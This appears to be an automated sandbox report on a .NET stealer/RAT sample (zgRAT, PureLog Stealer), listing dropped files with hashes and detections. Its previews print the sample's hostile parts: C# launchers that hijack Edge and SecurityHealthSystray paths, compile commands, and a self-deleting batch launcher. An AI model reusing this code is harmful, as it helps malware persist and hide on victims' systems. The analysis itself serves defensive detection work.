                                              SHA-512:600F3386DABCEEE10B4416B38075232A8644B163D03FFEAD6D9EB5787AF5ADB03DC54B4898F1E78157CEF90FAACD8F36C76801B0F4EB2243F9F98ADA4BEF3D86
                                              Malicious:false
                                              Preview:2O4X460sknTNRVOJvQfgp6MluzEOqMeSxoWYWwweG4qftqMFHJcJMDY6BSmF1lCXJAam90x9eA

                                              C:\Program Files (x86)\Windows Media Player\Network Sharing\XrtbrRarCSNElLBNKqySVVhxSZIi.exe

                                              Download File
                                              Process:C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe
                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Category:dropped
                                              Size (bytes):2011136
                                              Entropy (8bit):7.569188314300448
                                              Encrypted:false
                                              SSDEEP:49152:dbmZsvFi8eKtbbrI5E6OmK0ETDZns1X/A4kAK:dbmZs9btb3IS6OBZs1vA4p
                                              MD5:B8AA70ED9243F5AA9C8DD45E8B6C01E7
                                              SHA1:8D871A1D93CC069413563D42DAD3F098F4AC5E5D
                                              SHA-256:4CEB69AFC05B1475459075F2CD5688F6AA8FE6A9FF6CAE0A25D742B650C62351
                                              SHA-512:D2DB111500BA7BC55F0913F888A38BA7B3986C2439FC0ABD0CCD7FEB4D4AC0D7863EDB28C903CCB78C1F59E8EB29CBC4132AB2977560C2A5C21F089BB5CA72A7
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 63%
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...0..f................................. ........@.. ....................... ............@.................................P...K....... ............................................................................ ............... ..H............text........ ...................... ..`.rsrc... ...........................@....reloc..............................@..B........................H.......................,................................................0..........(.... ........8........E....M...).......N...8H...(.... ....~....{....9....& ....8....(.... ....~....{....:....& ....8....*(.... ....~....{....9....& ....8y......0..'....... ........8........E............j...F...............8........~....(J...~....(N... ....<g... ....~....{....9....& ....8....8N... ....~....{....9....& ....8u...8*... ....~....{h...:\...& ....8Q...r...ps....z*~....9@... ....81..

                                              C:\Program Files (x86)\Windows Media Player\Network Sharing\XrtbrRarCSNElLBNKqySVVhxSZIi.exe:Zone.Identifier

                                              Download File
                                              Process:C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):26
                                              Entropy (8bit):3.95006375643621
                                              Encrypted:false
                                              SSDEEP:3:ggPYV:rPYV
                                              MD5:187F488E27DB4AF347237FE461A079AD
                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                              Malicious:false
                                              Preview:[ZoneTransfer]....ZoneId=0

                                              C:\Program Files (x86)\Windows Portable Devices\9e8d7a4ca61bd9

                                              Download File
                                              Process:C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe
                                              File Type:ASCII text, with very long lines (626), with no line terminators
                                              Category:dropped
                                              Size (bytes):626
                                              Entropy (8bit):5.858931105326176
                                              Encrypted:false
                                              SSDEEP:12:amicuXO2xaVzeEsGSIZHXQPXJp/9DzWDq4bDWY2LYbIUSct2zmJ1vx4u:ate2gzeEsngHO5/LzDst2zCZ
                                              MD5:CA1A4FAF9AD2D3C1673A8C5C373DF1B4
                                              SHA1:6902E259C8B10941E3A651A65C0C4F864D154141
                                              SHA-256:092F6ED70DD1466105FD82B50051A019AA1FA5B069268295C5BAC79B05058644
                                              SHA-512:60985AEF8C2CE1291B4CAF2617917810230A7835C3C4CA3CA05CCA8B3CD1A85A64C1378C9F95794A21D02FACF76B06BD7E6BA7AA46E3A6FCA8345BB07FDCFC28
                                              Malicious:false
                                              Preview:8HguVGtQZWDJqne2TWsQjGQWdoMnnqUajc2efmy4qWjdt0xW526UJxD20KQq4GntBnjOuAWqiykNhxmn1zsvuAQvZAoVVH9js0cGQjm5fPwUNzUDhnzFY28BWyyuVBUayAerUgXRNwPfN5ijpkysS4L01btcv1je5WgNVnsBQh1lmdyaPOEuNmH4ynz3w4gVNvj0ZUOB2wbvCkNYnSMgwyQSOmYsyzOVAgX137B4AD2aKW1NZaPesAiYeRmx5gNCiGvgMWfqRRft50I2uLSXjum988XmVN8e001DkUBD5jMbeycnItCuNzcydviN92UDSB3F8ERZJObAhLfJgtdlLOQAXDkywxEDOJId4XoDbmk9XcQSQYrPYt2Eu3r5ecmWKYvYCBOIEaJinRn5wRiYFyofREsBqti99Oy8q2PPKjK8kTbcPvIM4ORVuQH8TMcU1KiYcoP4CTOgnp57nPv4lVEv7dNavR57GzGZvC9lgNKlAurFVJVDaitgGxb9ayJvXQZyifLkPKXXLcuMvIFl52giGkT7kAKsEZOtU3gz7uxQKVUnDONSthzeu0r7MO9P9pTwNA12lPnLFPYuQp4Vw28gju8dLjntuiQeCiZCXVqd4oZec6

                                              C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exe

                                              Download File
                                              Process:C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe
                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Category:dropped
                                              Size (bytes):2011136
                                              Entropy (8bit):7.569188314300448
                                              Encrypted:false
                                              SSDEEP:49152:dbmZsvFi8eKtbbrI5E6OmK0ETDZns1X/A4kAK:dbmZs9btb3IS6OBZs1vA4p
                                              MD5:B8AA70ED9243F5AA9C8DD45E8B6C01E7
                                              SHA1:8D871A1D93CC069413563D42DAD3F098F4AC5E5D
                                              SHA-256:4CEB69AFC05B1475459075F2CD5688F6AA8FE6A9FF6CAE0A25D742B650C62351
                                              SHA-512:D2DB111500BA7BC55F0913F888A38BA7B3986C2439FC0ABD0CCD7FEB4D4AC0D7863EDB28C903CCB78C1F59E8EB29CBC4132AB2977560C2A5C21F089BB5CA72A7
                                              Malicious:true
                                              Yara Hits:
                                              • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exe, Author: Joe Security
                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exe, Author: Joe Security
                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exe, Author: Joe Security
                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exe, Author: Joe Security
                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exe, Author: Joe Security
                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exe, Author: Joe Security
                                              Antivirus:
                                              • Antivirus: Avira, Detection: 100%
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              • Antivirus: ReversingLabs, Detection: 63%
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...0..f................................. ........@.. ....................... ............@.................................P...K....... ............................................................................ ............... ..H............text........ ...................... ..`.rsrc... ...........................@....reloc..............................@..B........................H.......................,................................................0..........(.... ........8........E....M...).......N...8H...(.... ....~....{....9....& ....8....(.... ....~....{....:....& ....8....*(.... ....~....{....9....& ....8y......0..'....... ........8........E............j...F...............8........~....(J...~....(N... ....<g... ....~....{....9....& ....8....8N... ....~....{....9....& ....8u...8*... ....~....{h...:\...& ....8Q...r...ps....z*~....9@... ....81..

                                              C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exe:Zone.Identifier

                                              Download File
                                              Process:C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):26
                                              Entropy (8bit):3.95006375643621
                                              Encrypted:false
                                              SSDEEP:3:ggPYV:rPYV
                                              MD5:187F488E27DB4AF347237FE461A079AD
                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                              Malicious:true
                                              Preview:[ZoneTransfer]....ZoneId=0

                                              C:\Recovery\3fcc2d96fa9fd9

                                              Download File
                                              Process:C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe
                                              File Type:ASCII text, with very long lines (755), with no line terminators
                                              Category:dropped
                                              Size (bytes):755
                                              Entropy (8bit):5.907383261208359
                                              Encrypted:false
                                              SSDEEP:12:2HPtn59tdFiA5q43STQj93XNhklfbu4w4sxPcoOdoqQj6kna6IqOVkfa3I1L7F:+tn59v384CgNhklj1slUDm6CSqHfWoV
                                              MD5:3EA4331A9B120AEE034D56F296A7472F
                                              SHA1:AAB16D561BCC9BDEB63EEE8A00836DF7ADC1298F
                                              SHA-256:DEFFCE6EA954D25FFD5B40E3F71CA012FC9E388D17521E6B1EF609401F287EEC
                                              SHA-512:7B94096B7E6FBABE96AB6790FD0D25657E4928C4581FAACF48324A37B16CED2B0FD53D9CEEB3DAF34609CD9FBC758278516ED96D0AA6E2559698D422B6720307
                                              Malicious:false
                                              Preview:dsVHPiVOJO4upp4Ksbi7N0VhnPm2BwuAMWIXwdwZHhfaNvvNZIcCmphnXye96cNXd4iThhXOpI0pU4U1dYd3TrXhzeA88wdoUI7SMcq2uNXey1Sddmfh8TDwhBeCgYP2oLVM6CpBslIFT3s7LhfWQ6qAELvL8nVV8fzmgGgb7eyXK8coSg1933msfUIvQdDEQxHyDFaEADYwHTzFsG2bwVbE2HHL8uKdbuGX1nkMFw90e0kMeCCJklR4VC568PGP24UXMcOFgpV9WljCg4q5sA3zcLByrnO0pt7kfMACy7n5QRiud2aEiLh1Bf4AaZX3beUmn9hT3oGuX8jKnQVzNJSeMFi9SAlZktdv76GeVGK4EweD5tXJEipSM0ZiahB3CrKneyNqK1dG9YZZleDincUCDLiHgiDxFR2Xm0iHgq9NEjTya965dcQjWHjTPFJlxqBrgBxu66C6cH8e2uqhlHTmASAfQP1agYZXhlSZML9haTHPJEbfZm9qXZrNBSdqFlZEsk7QbRUZHvLqKvVMxVB4YtAH3EX4sTcz3ChiHKDISjilOACQ6R2tkfq9jzXX3aryTWwINwEnR3lyKZ33BH7aasOYWi9RxqO21uR1N4CJMPcr31yK6dWwcRYkHYvpxxzlot7aHCpGExNKQheftyUTUbZkVquzIXWZa0CK4YC4yProDOUj4Q68cfRMUWEbR07rbyuZfUlVwafEuvgHWK42bX64jz0hTlm7RAMPd4DjokMBAMc

                                              C:\Recovery\XrtbrRarCSNElLBNKqySVVhxSZIi.exe

                                              Download File
                                              Process:C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe
                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Category:dropped
                                              Size (bytes):2011136
                                              Entropy (8bit):7.569188314300448
                                              Encrypted:false
                                              SSDEEP:49152:dbmZsvFi8eKtbbrI5E6OmK0ETDZns1X/A4kAK:dbmZs9btb3IS6OBZs1vA4p
                                              MD5:B8AA70ED9243F5AA9C8DD45E8B6C01E7
                                              SHA1:8D871A1D93CC069413563D42DAD3F098F4AC5E5D
                                              SHA-256:4CEB69AFC05B1475459075F2CD5688F6AA8FE6A9FF6CAE0A25D742B650C62351
                                              SHA-512:D2DB111500BA7BC55F0913F888A38BA7B3986C2439FC0ABD0CCD7FEB4D4AC0D7863EDB28C903CCB78C1F59E8EB29CBC4132AB2977560C2A5C21F089BB5CA72A7
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 63%
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...0..f................................. ........@.. ....................... ............@.................................P...K....... ............................................................................ ............... ..H............text........ ...................... ..`.rsrc... ...........................@....reloc..............................@..B........................H.......................,................................................0..........(.... ........8........E....M...).......N...8H...(.... ....~....{....9....& ....8....(.... ....~....{....:....& ....8....*(.... ....~....{....9....& ....8y......0..'....... ........8........E............j...F...............8........~....(J...~....(N... ....<g... ....~....{....9....& ....8....8N... ....~....{....9....& ....8u...8*... ....~....{h...:\...& ....8Q...r...ps....z*~....9@... ....81..

                                              C:\Recovery\XrtbrRarCSNElLBNKqySVVhxSZIi.exe:Zone.Identifier

                                              Download File
                                              Process:C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):26
                                              Entropy (8bit):3.95006375643621
                                              Encrypted:false
                                              SSDEEP:3:ggPYV:rPYV
                                              MD5:187F488E27DB4AF347237FE461A079AD
                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                              Malicious:false
                                              Preview:[ZoneTransfer]....ZoneId=0

                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe.log

                                              Download File
                                              Process:C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):1607
                                              Entropy (8bit):5.361331326633374
                                              Encrypted:false
                                              SSDEEP:48:MxHKQwYHKGSI6oPtHTHhAHKKkrJH1HzHKlT4vHNpv:iqbYqGSI6oPtzHeqKktVTqZ4vtpv
                                              MD5:EFAAB5F857466904742A13B17E993822
                                              SHA1:6CD78B3052F887B787B47559B0C578DA1E76F0E8
                                              SHA-256:F13D86DE2484AE4B0E3E8B869DA8F5A18CBE72AB0A41939B5D42A47DD84BFA0D
                                              SHA-512:6B1A9F61D4949A88F1552276E926132804B553606B7946757BFE4868270C05B2BEAEE4FBE56552D04E78E26B3E7AC5886363356F9BE4BBD68127CA0BF5304C35
                                              Malicious:true
                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Net.Http, Version=4.0.0.0, Culture=neutral, PublicKey

                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\XrtbrRarCSNElLBNKqySVVhxSZIi.exe.log

                                              Download File
                                              Process:C:\Program Files (x86)\AutoIt3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exe
                                              File Type:CSV text
                                              Category:dropped
                                              Size (bytes):847
                                              Entropy (8bit):5.354334472896228
                                              Encrypted:false
                                              SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                              MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                              SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                              SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                              SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                              Malicious:false
                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..

                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):19253
                                              Entropy (8bit):5.006225694120903
                                              Encrypted:false
                                              SSDEEP:384:hrib4ZmVoGIpN6KQkj2Fkjh4iUxDhQIeYo+OdBANXp5yvOjJlYoaYpib47:hLmV3IpNBQkj2Uh4iUxDhiYo+OdBANZD
                                              MD5:6EC700FCB0AE97553EC01FAEA088C747
                                              SHA1:2D184B28CB5949B49AD548781AD33CDE9BE1F100
                                              SHA-256:B60FC2B328749BD47822EE102E4F1D1618278CB6C899C9A2AAEF97C1F6410AEF
                                              SHA-512:D889E914C32104F69181E9880E4ABE98B71B3BDE0784AA7A8D3F20CE083CFACDB922A63935239339AA195A6B1AEB4C69C994C37A08E041C56A5CB5C91049F9DE
                                              Malicious:false
                                              Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:data
                                              Category:modified
                                              Size (bytes):64
                                              Entropy (8bit):1.1628158735648508
                                              Encrypted:false
                                              SSDEEP:3:Nllluldhz/lL:NllU
                                              MD5:03744CE5681CB7F5E53A02F19FA22067
                                              SHA1:234FB09010F6714453C83795D8CF3250D871D4DF
                                              SHA-256:88348573B57BA21639837E3AF19A00B4D7889E2D8E90A923151AC022D2946E5D
                                              SHA-512:0C05D6047DBA2286F8F72EB69A69919DC5650F96E8EE759BA9B3FC10BE793F3A88408457E700936BCACA02816CE25DD53F48B962491E7F4F0A4A534D88A855E6
                                              Malicious:false
                                              Preview:@...e.................................L..............@..........

                                              C:\Users\user\AppData\Local\Temp\0sp3gwcw\0sp3gwcw.0.cs

                                              Download File
                                              Process:C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe
                                              File Type:C++ source, Unicode text, UTF-8 (with BOM) text
                                              Category:dropped
                                              Size (bytes):431
                                              Entropy (8bit):5.105787542160684
                                              Encrypted:false
                                              SSDEEP:12:V/DNVgtDIbSf+eBL6LzIfiFkMSf+eBL6LPrJZiFkD:JNVQIbSfhWLzIiFkMSfhWLPrJwFkD
                                              MD5:415066276EC6738F350A1DAED3475ECD
                                              SHA1:AA8511B98DC28B93D6E5A2DDD27B4B6DF6EF883E
                                              SHA-256:9E667E3A6400A8D5B76CAAD206FD5A4C13EE53D6CA82F749054B4DDCACDA99CA
                                              SHA-512:B953590AAEC4D0D62B03EA1831469F4690FBD3DEA4D0C5045B3A64EC669C42DB5F517CFBC99572FCA52561F12CF1F0B9C35FEA63CE5635D2C45571B195732BC7
                                              Malicious:false
                                              Preview:.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Program Files (x86)\autoit3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exe"); } catch { } }).Start();. }.}.

                                              C:\Users\user\AppData\Local\Temp\0sp3gwcw\0sp3gwcw.cmdline

                                              Download File
                                              Process:C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe
                                              File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                              Category:dropped
                                              Size (bytes):269
                                              Entropy (8bit):5.136101982826086
                                              Encrypted:false
                                              SSDEEP:6:Hu+H2L//1xRf5oeTckKBzxsjGZxWE8ocNwi23frCXqDHn:Hu7L//TRRzscQlZDCeHn
                                              MD5:B0C24BADFB25AD97B9E6AAF6EE09BFD2
                                              SHA1:5FFCB80C1EC2F89B24DD16D51CB3037B6F4D48D5
                                              SHA-256:38DEE2661E7080E45D4218962D003F8966CD4672FF2711DBE4EBF08CC71442CD
                                              SHA-512:CDF61D94EAA7D34A272F9E653DBA54A06C5E2C82B40DC4A1896BC1189E9523D5C1F6446F93DF5DBB77F72E2D4FED05FC5A267AD0E01A924E6028ADE9DAF96573
                                              Malicious:true
                                              Preview:./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\0sp3gwcw\0sp3gwcw.0.cs"

                                              C:\Users\user\AppData\Local\Temp\0sp3gwcw\0sp3gwcw.out

                                              Download File
                                              Process:C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe
                                              File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (352), with CRLF, CR line terminators
                                              Category:modified
                                              Size (bytes):773
                                              Entropy (8bit):5.23721298529176
                                              Encrypted:false
                                              SSDEEP:24:KwI/un/VRzstDDCeHuKax5DqBVKVrdFAMBJTH:xN/VRzEMK2DcVKdBJj
                                              MD5:487D77C014B3E61AFB4D750E37FD8FF0
                                              SHA1:DE6DC27E3DCF4B886A286A203EA1BC9AC22E7EF0
                                              SHA-256:503A1B7AA657D7D0910049C67E5E05089C9D2730E6E26720277C482CC46271A6
                                              SHA-512:19A0E8793B64A90D6B27B2747529E6CF9BD3BF197AAEB0439BD0382D37F562183425EBFB0DF47E0A01E09308850446AA9443BF1F339598E0CF9F3B1484CCB663
                                              Malicious:false
                                              Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\0sp3gwcw\0sp3gwcw.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                              C:\Users\user\AppData\Local\Temp\1ke8OVZbVo.bat

                                              Download File
                                              Process:C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe
                                              File Type:DOS batch file, ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):224
                                              Entropy (8bit):5.313411275287726
                                              Encrypted:false
                                              SSDEEP:6:hCijTg3Nou1SV+DE7Jy4uKOZG1cNwi23faq:HTg9uYDE7JJvZ7
                                              MD5:2DFDAE2A03D2D7045DCDBDCB015AE326
                                              SHA1:5582994BEBD0C8EE307CB8610DBE298E049B003F
                                              SHA-256:F7CF10D57AC0FA145A46BC6BD7562B17F57D25B00FBB6198F63E14C3ED4DBA78
                                              SHA-512:F586138C34BC90A23796FAFB9293ED687E7A765658B77C7F02F37E8C56EB6108D2BC2A4888DBB80AD4FC9C32FADFB8D384BF34B0A1E7B2500AED47855A0E4C28
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Avira, Detection: 100%
                                              Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Recovery\XrtbrRarCSNElLBNKqySVVhxSZIi.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\1ke8OVZbVo.bat"

                                              C:\Users\user\AppData\Local\Temp\4gjcegjf\4gjcegjf.0.cs

                                              Download File
                                              Process:C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe
                                              File Type:C++ source, Unicode text, UTF-8 (with BOM) text
                                              Category:dropped
                                              Size (bytes):416
                                              Entropy (8bit):5.080467882458465
                                              Encrypted:false
                                              SSDEEP:12:V/DNVgtDIbSf+eBLZ7bfiFkMSf+eBL6LPrJZiFkD:JNVQIbSfhV7TiFkMSfhWLPrJwFkD
                                              MD5:E8CF9C5CA14240F987E47AF320CF58D8
                                              SHA1:21D89DDF1158A0B3C5EE75AEB6250852D46886F8
                                              SHA-256:3C2079B0FBAEE82E5BAD8C9C3CAD663705C28FD1CEFA2B757B0C1BFAD759CE67
                                              SHA-512:F32F56FF9494D7CA37AD8826F4DA6E68DCB5DC12EDAEEE94A67E31529B5763066B58E437F4DBC42F07BC10856D874D66ADB46C8D1B9B90EF1BD7E14BE079F1C3
                                              Malicious:false
                                              Preview:.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Windows\system32\SecurityHealthSystray.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Program Files (x86)\autoit3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exe"); } catch { } }).Start();. }.}.

                                              C:\Users\user\AppData\Local\Temp\4gjcegjf\4gjcegjf.cmdline

                                              Download File
                                              Process:C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe
                                              File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                              Category:dropped
                                              Size (bytes):254
                                              Entropy (8bit):5.101361725942141
                                              Encrypted:false
                                              SSDEEP:6:Hu+H2L//1xRT0T79BzxsjGZxWE8ocNwi23fZDPAMDPn:Hu7L//TRq79cQlZVzP
                                              MD5:4CB74295599CC8818FAD542367FA8096
                                              SHA1:E7F51A57D36D8EB6886C8BF2AAE4F2C11D80DE82
                                              SHA-256:26B96FBE6397A2712C0884C6598F6B66B7A457EBEBD51AFB221CD09649CB3CCB
                                              SHA-512:31689B90F35A745B5DF53A6D5F696FB3363E8B10D62AA3D25B90B87644375341196BA6D5B81FC859319D7E228D429DE2460F99CE4BCACD385E28B667BF9203F1
                                              Malicious:false
                                              Preview:./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\4gjcegjf\4gjcegjf.0.cs"

                                              C:\Users\user\AppData\Local\Temp\4gjcegjf\4gjcegjf.out

                                              Download File
                                              Process:C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe
                                              File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (337), with CRLF, CR line terminators
                                              Category:modified
                                              Size (bytes):758
                                              Entropy (8bit):5.253616928876986
                                              Encrypted:false
                                              SSDEEP:12:Ka/I/u7L//TRq79cQlZVz2KaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:KwI/un/Vq79tDVz2Kax5DqBVKVrdFAMb
